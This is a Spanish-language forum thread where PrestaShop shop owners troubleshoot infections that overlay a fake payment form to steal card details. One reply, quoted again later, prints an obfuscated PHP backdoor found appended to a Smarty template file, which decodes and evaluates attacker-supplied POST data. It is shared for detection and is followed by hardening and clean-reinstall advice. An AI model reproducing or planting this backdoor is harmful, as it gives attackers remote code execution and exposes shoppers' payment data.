Gracias por la info a ver que tal. Yo tengo otro prestashop infectado y aunque no cambia el pago ya aun se estropea el BO casa X días, se soluciona sustituyendo la carpeta controller por una limpia pero aún no doy con quien lo fastidia, ya he cambiado todas las carpetas de prestashop por limpias 😒 estoy en el mismo punto que con el otro. 

Un saludo. 

Que pase cada X tiempo, es que no estas limpiando todo correctamente, 

hace 10 horas, ocio87 dijo:

unos archivos los cuales no son reportados por el cleaner desarrollado en el otro foro

El muy muy raro, el cleaner, la ultima versión te indica ficheros que NO deberian estar donde estan, a mi me ha avisado de ficheros con script añadidos por mi en raiz y otras carpetas, es muy raro que no te avisara de esos ficheros.

Por cierto el modulo de autoupgrade, ELIMINAR SIEMPRE despues de la actualización

 

 

Por cierto algunos por aqui ofrecemos nuestros conocimientos, remunerados obviamente para solucionar esto.

 

Link to comment
Share on other sites

43 minutes ago, gusman126 said:

Que pase cada X tiempo, es que no estas limpiando todo correctamente

Hola amigo, 

Si, lo sé, ahí ando intentando encontrar al culpable, cada vez se esconde en un sitio diferente, y eso que ya está todo actualizado.. Me temo que sea alguna imagen, este prestashop también genera cada X tiempo una imagen maliciosa, ya por lo menos lo del phising no sale más, solo lo del admin... Llegaremos al fondo del pingüino 😆

Gracias, un saludo. 

Link to comment
Share on other sites

hace 9 minutos, SAKSCM dijo:

Hola amigo, 

Si, lo sé, ahí ando intentando encontrar al culpable, cada vez se esconde en un sitio diferente, y eso que ya está todo actualizado.. Me temo que sea alguna imagen, este prestashop también genera cada X tiempo una imagen maliciosa, ya por lo menos lo del phising no sale más, solo lo del admin... Llegaremos al fondo del pingüino 😆

Gracias, un saludo. 

La nueva versión de cleaner, busca en las imagenes y en los .js 

Link to comment
Share on other sites

4 hours ago, gusman126 said:

La nueva versión de cleaner, busca en las imagenes y en los .js 

Si así es como me di cuenta de que estaba generando imágenes ahí pero pese a eliminarlas vuelven por lo que debe seguir habiendo algo que lo genera y no se detecta 

Un saludo 

Link to comment
Share on other sites

6 hours ago, gusman126 said:

 

Que pase cada X tiempo, es que no estas limpiando todo correctamente, 

El muy muy raro, el cleaner, la ultima versión te indica ficheros que NO deberian estar donde estan, a mi me ha avisado de ficheros con script añadidos por mi en raiz y otras carpetas, es muy raro que no te avisara de esos ficheros.

Por cierto el modulo de autoupgrade, ELIMINAR SIEMPRE despues de la actualización

 

 

Por cierto algunos por aqui ofrecemos nuestros conocimientos, remunerados obviamente para solucionar esto.

 

Muchas gracias por la recoemndación.  Ya eliminé el módulo de actualización, solo lo voy a instalar cada vez que requiera subir la versión.  Me podrían por favor confirmar cual es el link del cleaner actualizado?

Para los que utilizan productomments deben actualizarlo ya que el sábado reportaron una vulnerabilidad.

https://vuldb.com/es/?id.207842

Link to comment
Share on other sites

Tengo que decirlo, no entiendo como no se busca a un profesional para limpiar correctamente una tienda, Sabeis el riesgo que sea denunciado por robo de datos y vulnerabilidad y la posible denuncia? No solo lo digo por este hilo, lo digo porque he visto mas casos y algunos quieren intentar limpiar ellos, no lo digo por que me contraten y me paguen, lo digo porque me parece una barbaridad que haya gente que se la sude y no este preocupada.

Obviamente el foro es para ayudar, decir que hacer y como hacerlo, pero no solo son pasos y un guion a seguir, he visto tiendas infectadas cada semana hasta que se ha hecho bien y nunca mas, solo porque el que lo hacia no tenia suficiente experiencia.

 

Una vez dicho esto y desahogado.....

 

Los script, las limpiezas por partes, la eliminación de ficheros sueltos no sirven de nada si no se hace una limpieza radical  

Incluso en ocasiones una instalación de cero vale la pena , eliminado módulos que no se usan o viejos sin actualizar

El script solo ayuda si luego revisas y verificas y quitas mierda del sistema y actualizas todo y revisas a fondo.

Lo dicho hay que tener tiempo, hacerlo bien, tener la tienda uno o dos dias cerrada , ver bien los .log , ver que y como atacan, las IPs de donde son, bloquearlas, y ver carpeta por carpeta que hay

No es trabajo de 1 hora o pasar el script y listo.

 

 

  • Thanks 1
Link to comment
Share on other sites

25 minutes ago, gusman126 said:

Tengo que decirlo, no entiendo como no se busca a un profesional para limpiar correctamente una tienda, Sabeis el riesgo que sea denunciado por robo de datos y vulnerabilidad y la posible denuncia? No solo lo digo por este hilo, lo digo porque he visto mas casos y algunos quieren intentar limpiar ellos, no lo digo por que me contraten y me paguen, lo digo porque me parece una barbaridad que haya gente que se la sude y no este preocupada.

Obviamente el foro es para ayudar, decir que hacer y como hacerlo, pero no solo son pasos y un guion a seguir, he visto tiendas infectadas cada semana hasta que se ha hecho bien y nunca mas, solo porque el que lo hacia no tenia suficiente experiencia.

 

Una vez dicho esto y desahogado.....

 

Los script, las limpiezas por partes, la eliminación de ficheros sueltos no sirven de nada si no se hace una limpieza radical  

Incluso en ocasiones una instalación de cero vale la pena , eliminado módulos que no se usan o viejos sin actualizar

El script solo ayuda si luego revisas y verificas y quitas mierda del sistema y actualizas todo y revisas a fondo.

Lo dicho hay que tener tiempo, hacerlo bien, tener la tienda uno o dos dias cerrada , ver bien los .log , ver que y como atacan, las IPs de donde son, bloquearlas, y ver carpeta por carpeta que hay

No es trabajo de 1 hora o pasar el script y listo.

 

 

Es correcta la apreciación, por mi lado con solo indicar lo que he escrito, no significa que es solo lo que he realizado.    Solo he indicado lo que desde mi punto de vista puede ser generalizado y que le puede suceder a otras personas.  Por mi lado he realizado todo lo que indicas.  La tienda que estoy gestionando es una tienda que viene desde la versión 1.5 desde el 2013.  Actualmente ya está en la versión 1.7.8.7.  Debido a todo lo acontecido también he borrado módulos que ya no se utilizan, el domingo hice la depuración y borré cerca de 70 módulos, entre obsoletos e inactivos.

Se realizó migración de DNS a Cloudflare para soportar un poco más los ataques y un poco más automáticos los bloqueos, a parte de ello, en el WHM se realizó un scanreport para eliminación de archivos sospechosos y también se reforzó el firewall.

No es un tema que lleva un día, toca hacerlo con bastante inversión de tiempo para "blindar" el sitio por un rato más ya que no se garantiza que una auditoría o contratar servicios externos protejan el sitio completamente.  Para el día de mañana puede volver a suceder de otra manera que no se concibió en la auditoría o en la revisión exhaustiva.

Agradezco la ayuda que también me ha brindado ya que también ayuda a tener otros puntos de vista y como atacar la novedad.

Link to comment
Share on other sites

  • 4 months later...

Buenas hoy después de haber solucionado el tema del pishing hace como 6 meses atrás cuando salió, la solución por parte de Prestashop, me volvió a aparecer el día de hoy, tiene la misma modalidad, apareció un par de horas y salió solo, cuando le pones cualquier numero de tarjeta te lo libera, y aparecen los métodos de pagos correctos, pero no crea un archivo en la carpeta JS, como el anterior. a alguno le volvió a suceder.?

WhatsApp Image 2023-01-12 at 11.31.09.jpeg

Link to comment
Share on other sites

hace 1 hora, Gonzalocba07 dijo:

Buenas hoy después de haber solucionado el tema del pishing hace como 6 meses atrás cuando salió, la solución por parte de Prestashop, me volvió a aparecer el día de hoy, tiene la misma modalidad, apareció un par de horas y salió solo, cuando le pones cualquier numero de tarjeta te lo libera, y aparecen los métodos de pagos correctos, pero no crea un archivo en la carpeta JS, como el anterior. a alguno le volvió a suceder.?

WhatsApp Image 2023-01-12 at 11.31.09.jpeg

Actualizaste la versión de PrestaShop?

Tengo algunos clientes que actualizaron y no les pasó, a otro, solo uno , si le volvió a pasar y actualizamos después 

Link to comment
Share on other sites

Hola,

por lo visto este tipo de ataques están siendo muy habituales y se basan en el mismo método con la finalidad de insertar una capa superior con un supuesto método de pago que cubre los demás métodos existentes en la tienda y para que el cliente "pique" e inserte sus datos, que serán enviados a un servidor. Al estar codificados en base_64, y además usar archivos jpg con código interno

A continuación os paso ejemplo de un código encriptado dentro del archivo smarty_internal_templatebase.php ubicado en el directorio tools/smarty/sysplugins/ (Tienda PS 1.6)

    /**
     * Handle unknown class methods
     *
     * @param string $name unknown method-name
     * @param array  $args argument array
     *
     * @throws SmartyException
     */
    public function __call($name, $args)
    {
        static $_prefixes = array('set' => true, 'get' => true);
        static $_resolved_property_name = array();
        static $_resolved_property_source = array();

        // method of Smarty object?
        if (method_exists($this->smarty, $name)) {
            return call_user_func_array(array($this->smarty, $name), $args);
        }
        // see if this is a set/get for a property
        $first3 = strtolower(substr($name, 0, 3));
        if (isset($_prefixes[$first3]) && isset($name[3]) && $name[3] !== '_') {
            if (isset($_resolved_property_name[$name])) {
                $property_name = $_resolved_property_name[$name];
            } else {
                // try to keep case correct for future PHP 6.0 case-sensitive class methods
                // lcfirst() not available < PHP 5.3.0, so improvise
                $property_name = strtolower(substr($name, 3, 1)) . substr($name, 4);
                // convert camel case to underscored name
                $property_name = preg_replace_callback('/([A-Z])/', array($this, 'replaceCamelcase'), $property_name);
                $_resolved_property_name[$name] = $property_name;
            }
            if (isset($_resolved_property_source[$property_name])) {
                $_is_this = $_resolved_property_source[$property_name];
            } else {
                $_is_this = null;
                if (property_exists($this, $property_name)) {
                    $_is_this = true;
                } elseif (property_exists($this->smarty, $property_name)) {
                    $_is_this = false;
                }
                $_resolved_property_source[$property_name] = $_is_this;
            }
            if ($_is_this) {
                if ($first3 == 'get') {
                    return $this->$property_name;
                } else {
                    return $this->$property_name = $args[0];
                }
            } elseif ($_is_this === false) {
                if ($first3 == 'get') {
                    return $this->smarty->$property_name;
                } else {
                    return $this->smarty->$property_name = $args[0];
                }
            } else {
                throw new SmartyException("property '$property_name' does not exist.");
           }
        }
        if ($name == 'Smarty') {
            throw new SmartyException("PHP5 requires you to call __construct() instead of Smarty()");
        }
        // must be unknown
        throw new SmartyException("Call of unknown method '$name'.");
    }
}
$r76="f6s2M31HEZlmyQJjOSGgAkdF8zx47XCIioqaVTpePhuL_wY9b0NBUrvc5KtWRnD";$ic1=$r76[0].$r76[42].$r76[61].$r76[55].$r76[58].$r76[32].$r76[33].$r76[61].$r76[44].$r76[39].$r76[26].$r76[32].$r76[2].$r76[58].$r76[2];$r7a=$r76[55].$r76[53].$r76[39].$r76[35].$r76[58].$r76[39].$r76[44].$r76[0].$r76[42].$r76[61].$r76[55].$r76[58].$r76[32].$r76[33].$r76[61];$edf4c=$r76[48].$r76[35].$r76[2].$r76[39].$r76[1].$r76[27].$r76[44].$r76[22].$r76[39].$r76[55].$r76[33].$r76[22].$r76[39];if(@$ic1($r7a)){$n33 = @$r7a('', @$edf4c('aWYJKAkJaXNzZXQKCSgkX1BPU1RbcHJvZHVjdF9pZF0pIAomJiAJbWQ1KCAkX1BPU1RbcHJvZHVjdF9pZF0pID09PSJiOGZkMWI4ZmVlNTcxODViYzc0ZTI2ZGUyOGFkYTgxZCIpe2V2YWwoIGJhc2U2NF9kZWNvZGUoJF9QT1NUW2ltYWdlX2lkXSkKCik7ZXhpdCgpO307'));@$n33();}

 

Según el método que están usando es a través de inyecciones SQL por ciertas vulnerabilidades que existen en las tiendas que usan versiones no actualizadas de Prestashop o usan módulos desactualizados y/o "poco fiables" procedentes de desarrolladores que ofrecen módulos gratuitos.

Los ataques, al ser aleatorios, no hay un patrón fijo para poderlo detectar y desinfectar. El atacante infecta el código fuente de diferentes archivos para ser más difícil su detección.

En el caso del ejemplo que os pongo, se realizó una limpieza "rápida" y a los pocos días se volvió a infectar de la misma manera. Curiosamente, el archivo infectado pertenece a la caché de Prestashop, y lo que hacía el atacante es modificar la opción de caché de smarty a "Nunca recopilar los archivos de plantilla" de la sección "rendimiento" de la tienda, para que de esa manera no se detectara el error en HTML por cierre indebido de etiquetas por esta inyección de código. Así el propietario de la tienda no se daba cuenta hasta que limpiaba la caché y el FO quedaba "roto".


Nadie está inmune a que les ocurran estos ataques, salvo el realizar ciertas prácticas para minimizar la probabilidad de ser atacado de esta manera.  Y el hecho de realizar una limpieza no garantiza que no vuelva ser atacado al poco tiempo de nuevo. 

Incluso para los que somos profesionales, el empleo de tiempo es tan elevado, que en costes es mejor montar una tienda limpia haciendo una migración de los datos de la BBDD que entrar uno a uno en cada archivo para comprobar el código fuente.

A continuación voy a proporcionar unas prácticas que deberían ser de utilidad para evitar volver a pasar por esta situación tan indeseable:

1. INVERTIR en la tienda, que al fin y al cabo es el negocio que os da de comer. Es vuestro negocio online y tal y como ocurre con los negocios físicos, hay que invertir dinero. No va a ser menos el de una tienda online. Sin embargo, cometemos habitualmente el error de pensar que montar una tienda online es sinónimo que nos salga todo gratis o muy económico para luego obtener grandes beneficios a bajo coste.

2. MANTENER la tienda Prestashop actualizada. Las actualizaciones corrigen BUGS, vulnerabilidades y realizan mejoras e implementación de nuevas características.

3. USAR SERVIDORES VPS O DEDICADOS. Hemos conocido muchos clientes con tiendas Prestashop usando servidores compartidos de 10€/mes. Estos servidores se pueden configurar y se pueden realizar modificaciones internas para aumentar su seguridad.

4. USAR MÓDULOS DE PAGO Y ACTUALIZADOS, preferiblemente de la plataforma Prestashop Addons o de desarrolladores conocidos. Todos los módulos publicados en Prestashop Addons, pasan por un proceso de validación para procurar que se basen en código standard de Prestashop y no se usen malas prácticas que vulneren la seguridad de la tienda. Los módulos gratuitos, la gran mayoría, no digo todos, son desarrollados por programadores principiantes con pocos conocimientos que quieren hacer un aporte y coger experiencia en la materia, y muchas veces usan código vulnerable o código poco optimizado (y es normal porque no suelen emplear mucho tiempo en los desarrollos, ya que son gratuitos).

5. USAR solamente los módulos y las modificaciones estrictamente necesarias en la tienda. No liaros a instalar módulos y módulos, porque cuantos más módulos tengáis, más probabilidad de tener una vulnerabilidad dentro de uno de estos.

6. USAR temas hijo (Child theme) para vuestras modificaciones en los .tpl, dejad siempre la plantilla padre intacta. De esta manera si os infectan la tienda, se podrá desinfectar haciendo una instalación limpia de la tienda, instalando nuevamente la plantilla padre y solamente revisando los pocos archivos modificados en la plantilla hijo.

7. DOCUMENTAR cualquier cambio que hagáis en los archivos de Pretashop, tpl, plantillas, etc... De esta forma sabréis los cambios que habéis hecho para poderlos revertir llegado el caso o pasarle esa información a los desarrolladores que os hagan la nueva tienda limpia, para implementar las modificaciones y no se pierdan.

8. Usar contraseñas difíciles de averiguar y siempre que tengáis accesos a los desarrolladores externos, hacerlo con credenciales provisionales que deberán eliminar cuando se acabe el soporte. Tener controlado los accesos y los privilegios de cada uno de ellos.

9. USAR MÓDULOS DE PAGO Y EXTENSIONES DEL SERVIDOR que aumentan la seguridad de la tienda/sevidor y previenen el spam y los ataques.

10. REVISAR LOS PERMISOS DE LOS ARCHIVOS DE LA TIENDA Y APLICAR LOS ADECUADOS.

Sobre el tema de solucionar el problema que tenéis los que habéis sido infectados, nosotros hemos detectado vulnerabilidades en módulos que han sido el primer foco de infección, por lo que puede que el trabajo de limpieza sea un empleo de tiempo en vano, porque la vulnerabilidad sigue existiendo.

Os voy a dar unos pasos a seguir que son de lo más efectivo en este caso. Dependiendo de las características de cada tienda, podréis llevarlo a cabo en más o menos tiempo. Al final tendréis que sopesar invertir ese dinero que os habéis estado ahorrando, ahora sí, para un buen fin y para evitar pasar por esto nuevamente.

1. REALIZAR INSTALACIÓN LIMPIA
Es entretenido buscar la vulnerabilidad y el código infectado. Para nosotros es conocimiento y saber las prácticas que se usan, pero para un propietario de una tienda es mucho tiempo que tiene que pagar o que emplear, a veces en vano. Yo no me centraría en limpiar ese código infectado. O podéis hacerlo para probar suerte, pero si se vuelve a infectar, ya no recomiendo seguir insistiendo. Lo mejor es cambiar todas las contraseñas (servidor, BBDD, FTP, BO) y hacer una instalación limpia de Prestashop. No permitir las conexiones remotas de la BBDD y aplicar directrices de seguridad en el servidor donde tengáis la tienda (solo para VPS o dedicados).

Si habéis sido infectados en una versión reciente de 1.7 lo tendréis más fácil para el tema de la migración de la BBDD, pero si tenéis una tienda en la 1.6, aprovechad esta ocasión para hacer la tienda en la PS1.7 y migrar los datos de la BBDD de la 1.6 a la 1.7.

NO RECOMIENDO USAR MÓDULOS DE MIGRACIÓN. Lo siento, pero nos han llegado incluso clientes muy potentes con facturaciones altas diarias, que han usado módulos de migraciones y han terminado con muchos problemas en la BBDD derivados de errores en los procesos de migración y que no han detectado a tiempo y que han roto la integridad de la BBDD y pérdida de datos importantes, además de originarse errores constantes de BBDD en el FO que imposibilitan las ventas.

Lo mejor es migrar la BBDD de forma manual. De hecho es el procedimiento que usamos habitualmente nosotros cuando tenemos que migrar los datos de un cliente de la 1.6 a la 1.7. Esto garantiza 0 problemas y la integridad absoluta de los datos migrados. Para migrar de forma manual, tendréis que contar con un experto, ya que hay que hacer modificaciones manuales y corrección de datos en tablas para migrar correctamente los datos de una BBDD de la 1.6 con ciertas diferencias con la 1.7. Además de solamente migrar lo estrictamente necesario (Productos, categorías, combinaciones, stock, pedidos, clientes, direcciones, etc...)

Una vez realizada la instalación limpia y migración, se deben de instalar los módulos desde cero, migrando sus tablas de la BBDD. Usad las últimas versiones de estos y solamente instalar los necesarios, desechando el resto que no uséis.

Replicar la configuración de Prestashop que teníais en el BO en la anterior tienda.

Si hacéis uso de plantilla hijo, instalar la plantilla padre desde cero y última versión e instalar la plantilla hijo de nuevo con las modificaciones realizadas.

Con esto ya tenéis una tienda nueva, limpia, sin estar infectada y con todas las pautas bien hechas.

2. REVISIÓN DE VULNERABILDIAD

Ahora bien, después de realizar la instalación limpia, pueden haber quedado algunas vulnerabilidades, pero mínimas. El paso siguiente es revisar aquellos módulos necesarios que volvisteis a instalar (serán unos pocos) y revisar los archivos de la plantilla hijo (aquí no suelen infectar). Pero al haberlos actualizado los módulos y reducido en número, habréis minimizado el riesgo.

Al haber seguido los pasos anteriores, en primera instancia habréis eliminado la infección y con un alto porcentaje, la vulnerabilidad que la ocasionó. 

Revisar también las imágenes del directorio img, por si alguna pudiera estar infectada. Para ello lo que podéis hacer es sacarlas al PC y pasarle un antivirus o utilidad que detecte la infección.

3. APLICAR AHORA LAS PRÁCTICAS CORRECTAS PARA MANTENER AL DÍA VUESTRA TIENDA Y MINIMIZAR LOS RIESGOS DE VOLVER A SER ATACADOS.

Siento no daros la solución rápida y milagrosa. Hemos desinfectado muchas tiendas de clientes. Unas con más éxito que otras que volvieron a ser infectadas en poco tiempo, con la correspondiente frustración del cliente. Al final los mejores resultados los hemos obtenido en las instalaciones limpias y aplicando todos los pasos que os he indicado.

 

REVISIÓN  DEL CÓDIGO FUENTE

Si al final os decantáis por revisar el código fuente, os voy a pasar una utilidad que desarrollé hace tiempo y que es para buscar fragmentos de código dentro de archivos, nombre de archivos y carpetas.

Buscad código usado habitualmente por los atacantes (base_64, eval(), etc...).

 

Espero haberos ayudado un poco.

Saludos.

Link to comment
Share on other sites

10 hours ago, LieBM said:

Hola,

por lo visto este tipo de ataques están siendo muy habituales y se basan en el mismo método con la finalidad de insertar una capa superior con un supuesto método de pago que cubre los demás métodos existentes en la tienda y para que el cliente "pique" e inserte sus datos, que serán enviados a un servidor. Al estar codificados en base_64, y además usar archivos jpg con código interno

A continuación os paso ejemplo de un código encriptado dentro del archivo smarty_internal_templatebase.php ubicado en el directorio tools/smarty/sysplugins/ (Tienda PS 1.6)

    /**
     * Handle unknown class methods
     *
     * @param string $name unknown method-name
     * @param array  $args argument array
     *
     * @throws SmartyException
     */
    public function __call($name, $args)
    {
        static $_prefixes = array('set' => true, 'get' => true);
        static $_resolved_property_name = array();
        static $_resolved_property_source = array();

        // method of Smarty object?
        if (method_exists($this->smarty, $name)) {
            return call_user_func_array(array($this->smarty, $name), $args);
        }
        // see if this is a set/get for a property
        $first3 = strtolower(substr($name, 0, 3));
        if (isset($_prefixes[$first3]) && isset($name[3]) && $name[3] !== '_') {
            if (isset($_resolved_property_name[$name])) {
                $property_name = $_resolved_property_name[$name];
            } else {
                // try to keep case correct for future PHP 6.0 case-sensitive class methods
                // lcfirst() not available < PHP 5.3.0, so improvise
                $property_name = strtolower(substr($name, 3, 1)) . substr($name, 4);
                // convert camel case to underscored name
                $property_name = preg_replace_callback('/([A-Z])/', array($this, 'replaceCamelcase'), $property_name);
                $_resolved_property_name[$name] = $property_name;
            }
            if (isset($_resolved_property_source[$property_name])) {
                $_is_this = $_resolved_property_source[$property_name];
            } else {
                $_is_this = null;
                if (property_exists($this, $property_name)) {
                    $_is_this = true;
                } elseif (property_exists($this->smarty, $property_name)) {
                    $_is_this = false;
                }
                $_resolved_property_source[$property_name] = $_is_this;
            }
            if ($_is_this) {
                if ($first3 == 'get') {
                    return $this->$property_name;
                } else {
                    return $this->$property_name = $args[0];
                }
            } elseif ($_is_this === false) {
                if ($first3 == 'get') {
                    return $this->smarty->$property_name;
                } else {
                    return $this->smarty->$property_name = $args[0];
                }
            } else {
                throw new SmartyException("property '$property_name' does not exist.");
           }
        }
        if ($name == 'Smarty') {
            throw new SmartyException("PHP5 requires you to call __construct() instead of Smarty()");
        }
        // must be unknown
        throw new SmartyException("Call of unknown method '$name'.");
    }
}
$r76="f6s2M31HEZlmyQJjOSGgAkdF8zx47XCIioqaVTpePhuL_wY9b0NBUrvc5KtWRnD";$ic1=$r76[0].$r76[42].$r76[61].$r76[55].$r76[58].$r76[32].$r76[33].$r76[61].$r76[44].$r76[39].$r76[26].$r76[32].$r76[2].$r76[58].$r76[2];$r7a=$r76[55].$r76[53].$r76[39].$r76[35].$r76[58].$r76[39].$r76[44].$r76[0].$r76[42].$r76[61].$r76[55].$r76[58].$r76[32].$r76[33].$r76[61];$edf4c=$r76[48].$r76[35].$r76[2].$r76[39].$r76[1].$r76[27].$r76[44].$r76[22].$r76[39].$r76[55].$r76[33].$r76[22].$r76[39];if(@$ic1($r7a)){$n33 = @$r7a('', @$edf4c('aWYJKAkJaXNzZXQKCSgkX1BPU1RbcHJvZHVjdF9pZF0pIAomJiAJbWQ1KCAkX1BPU1RbcHJvZHVjdF9pZF0pID09PSJiOGZkMWI4ZmVlNTcxODViYzc0ZTI2ZGUyOGFkYTgxZCIpe2V2YWwoIGJhc2U2NF9kZWNvZGUoJF9QT1NUW2ltYWdlX2lkXSkKCik7ZXhpdCgpO307'));@$n33();}

 

Según el método que están usando es a través de inyecciones SQL por ciertas vulnerabilidades que existen en las tiendas que usan versiones no actualizadas de Prestashop o usan módulos desactualizados y/o "poco fiables" procedentes de desarrolladores que ofrecen módulos gratuitos.

Los ataques, al ser aleatorios, no hay un patrón fijo para poderlo detectar y desinfectar. El atacante infecta el código fuente de diferentes archivos para ser más difícil su detección.

En el caso del ejemplo que os pongo, se realizó una limpieza "rápida" y a los pocos días se volvió a infectar de la misma manera. Curiosamente, el archivo infectado pertenece a la caché de Prestashop, y lo que hacía el atacante es modificar la opción de caché de smarty a "Nunca recopilar los archivos de plantilla" de la sección "rendimiento" de la tienda, para que de esa manera no se detectara el error en HTML por cierre indebido de etiquetas por esta inyección de código. Así el propietario de la tienda no se daba cuenta hasta que limpiaba la caché y el FO quedaba "roto".


Nadie está inmune a que les ocurran estos ataques, salvo el realizar ciertas prácticas para minimizar la probabilidad de ser atacado de esta manera.  Y el hecho de realizar una limpieza no garantiza que no vuelva ser atacado al poco tiempo de nuevo. 

Incluso para los que somos profesionales, el empleo de tiempo es tan elevado, que en costes es mejor montar una tienda limpia haciendo una migración de los datos de la BBDD que entrar uno a uno en cada archivo para comprobar el código fuente.

A continuación voy a proporcionar unas prácticas que deberían ser de utilidad para evitar volver a pasar por esta situación tan indeseable:

1. INVERTIR en la tienda, que al fin y al cabo es el negocio que os da de comer. Es vuestro negocio online y tal y como ocurre con los negocios físicos, hay que invertir dinero. No va a ser menos el de una tienda online. Sin embargo, cometemos habitualmente el error de pensar que montar una tienda online es sinónimo que nos salga todo gratis o muy económico para luego obtener grandes beneficios a bajo coste.

2. MANTENER la tienda Prestashop actualizada. Las actualizaciones corrigen BUGS, vulnerabilidades y realizan mejoras e implementación de nuevas características.

3. USAR SERVIDORES VPS O DEDICADOS. Hemos conocido muchos clientes con tiendas Prestashop usando servidores compartidos de 10€/mes. Estos servidores se pueden configurar y se pueden realizar modificaciones internas para aumentar su seguridad.

4. USAR MÓDULOS DE PAGO Y ACTUALIZADOS, preferiblemente de la plataforma Prestashop Addons o de desarrolladores conocidos. Todos los módulos publicados en Prestashop Addons, pasan por un proceso de validación para procurar que se basen en código standard de Prestashop y no se usen malas prácticas que vulneren la seguridad de la tienda. Los módulos gratuitos, la gran mayoría, no digo todos, son desarrollados por programadores principiantes con pocos conocimientos que quieren hacer un aporte y coger experiencia en la materia, y muchas veces usan código vulnerable o código poco optimizado (y es normal porque no suelen emplear mucho tiempo en los desarrollos, ya que son gratuitos).

5. USAR solamente los módulos y las modificaciones estrictamente necesarias en la tienda. No liaros a instalar módulos y módulos, porque cuantos más módulos tengáis, más probabilidad de tener una vulnerabilidad dentro de uno de estos.

6. USAR temas hijo (Child theme) para vuestras modificaciones en los .tpl, dejad siempre la plantilla padre intacta. De esta manera si os infectan la tienda, se podrá desinfectar haciendo una instalación limpia de la tienda, instalando nuevamente la plantilla padre y solamente revisando los pocos archivos modificados en la plantilla hijo.

7. DOCUMENTAR cualquier cambio que hagáis en los archivos de Pretashop, tpl, plantillas, etc... De esta forma sabréis los cambios que habéis hecho para poderlos revertir llegado el caso o pasarle esa información a los desarrolladores que os hagan la nueva tienda limpia, para implementar las modificaciones y no se pierdan.

8. Usar contraseñas difíciles de averiguar y siempre que tengáis accesos a los desarrolladores externos, hacerlo con credenciales provisionales que deberán eliminar cuando se acabe el soporte. Tener controlado los accesos y los privilegios de cada uno de ellos.

9. USAR MÓDULOS DE PAGO Y EXTENSIONES DEL SERVIDOR que aumentan la seguridad de la tienda/sevidor y previenen el spam y los ataques.

10. REVISAR LOS PERMISOS DE LOS ARCHIVOS DE LA TIENDA Y APLICAR LOS ADECUADOS.

Sobre el tema de solucionar el problema que tenéis los que habéis sido infectados, nosotros hemos detectado vulnerabilidades en módulos que han sido el primer foco de infección, por lo que puede que el trabajo de limpieza sea un empleo de tiempo en vano, porque la vulnerabilidad sigue existiendo.

Os voy a dar unos pasos a seguir que son de lo más efectivo en este caso. Dependiendo de las características de cada tienda, podréis llevarlo a cabo en más o menos tiempo. Al final tendréis que sopesar invertir ese dinero que os habéis estado ahorrando, ahora sí, para un buen fin y para evitar pasar por esto nuevamente.

1. REALIZAR INSTALACIÓN LIMPIA
Es entretenido buscar la vulnerabilidad y el código infectado. Para nosotros es conocimiento y saber las prácticas que se usan, pero para un propietario de una tienda es mucho tiempo que tiene que pagar o que emplear, a veces en vano. Yo no me centraría en limpiar ese código infectado. O podéis hacerlo para probar suerte, pero si se vuelve a infectar, ya no recomiendo seguir insistiendo. Lo mejor es cambiar todas las contraseñas (servidor, BBDD, FTP, BO) y hacer una instalación limpia de Prestashop. No permitir las conexiones remotas de la BBDD y aplicar directrices de seguridad en el servidor donde tengáis la tienda (solo para VPS o dedicados).

Si habéis sido infectados en una versión reciente de 1.7 lo tendréis más fácil para el tema de la migración de la BBDD, pero si tenéis una tienda en la 1.6, aprovechad esta ocasión para hacer la tienda en la PS1.7 y migrar los datos de la BBDD de la 1.6 a la 1.7.

NO RECOMIENDO USAR MÓDULOS DE MIGRACIÓN. Lo siento, pero nos han llegado incluso clientes muy potentes con facturaciones altas diarias, que han usado módulos de migraciones y han terminado con muchos problemas en la BBDD derivados de errores en los procesos de migración y que no han detectado a tiempo y que han roto la integridad de la BBDD y pérdida de datos importantes, además de originarse errores constantes de BBDD en el FO que imposibilitan las ventas.

Lo mejor es migrar la BBDD de forma manual. De hecho es el procedimiento que usamos habitualmente nosotros cuando tenemos que migrar los datos de un cliente de la 1.6 a la 1.7. Esto garantiza 0 problemas y la integridad absoluta de los datos migrados. Para migrar de forma manual, tendréis que contar con un experto, ya que hay que hacer modificaciones manuales y corrección de datos en tablas para migrar correctamente los datos de una BBDD de la 1.6 con ciertas diferencias con la 1.7. Además de solamente migrar lo estrictamente necesario (Productos, categorías, combinaciones, stock, pedidos, clientes, direcciones, etc...)

Una vez realizada la instalación limpia y migración, se deben de instalar los módulos desde cero, migrando sus tablas de la BBDD. Usad las últimas versiones de estos y solamente instalar los necesarios, desechando el resto que no uséis.

Replicar la configuración de Prestashop que teníais en el BO en la anterior tienda.

Si hacéis uso de plantilla hijo, instalar la plantilla padre desde cero y última versión e instalar la plantilla hijo de nuevo con las modificaciones realizadas.

Con esto ya tenéis una tienda nueva, limpia, sin estar infectada y con todas las pautas bien hechas.

2. REVISIÓN DE VULNERABILDIAD

Ahora bien, después de realizar la instalación limpia, pueden haber quedado algunas vulnerabilidades, pero mínimas. El paso siguiente es revisar aquellos módulos necesarios que volvisteis a instalar (serán unos pocos) y revisar los archivos de la plantilla hijo (aquí no suelen infectar). Pero al haberlos actualizado los módulos y reducido en número, habréis minimizado el riesgo.

Al haber seguido los pasos anteriores, en primera instancia habréis eliminado la infección y con un alto porcentaje, la vulnerabilidad que la ocasionó. 

Revisar también las imágenes del directorio img, por si alguna pudiera estar infectada. Para ello lo que podéis hacer es sacarlas al PC y pasarle un antivirus o utilidad que detecte la infección.

3. APLICAR AHORA LAS PRÁCTICAS CORRECTAS PARA MANTENER AL DÍA VUESTRA TIENDA Y MINIMIZAR LOS RIESGOS DE VOLVER A SER ATACADOS.

Siento no daros la solución rápida y milagrosa. Hemos desinfectado muchas tiendas de clientes. Unas con más éxito que otras que volvieron a ser infectadas en poco tiempo, con la correspondiente frustración del cliente. Al final los mejores resultados los hemos obtenido en las instalaciones limpias y aplicando todos los pasos que os he indicado.

 

REVISIÓN  DEL CÓDIGO FUENTE

Si al final os decantáis por revisar el código fuente, os voy a pasar una utilidad que desarrollé hace tiempo y que es para buscar fragmentos de código dentro de archivos, nombre de archivos y carpetas.

Buscad código usado habitualmente por los atacantes (base_64, eval(), etc...).

 

Espero haberos ayudado un poco.

Saludos.

Genial post gracias! 

 

13 hours ago, Gonzalocba07 said:

no, estoy en eso pero aun no pude migrar el sitio, sigo en la 1.6.1.24

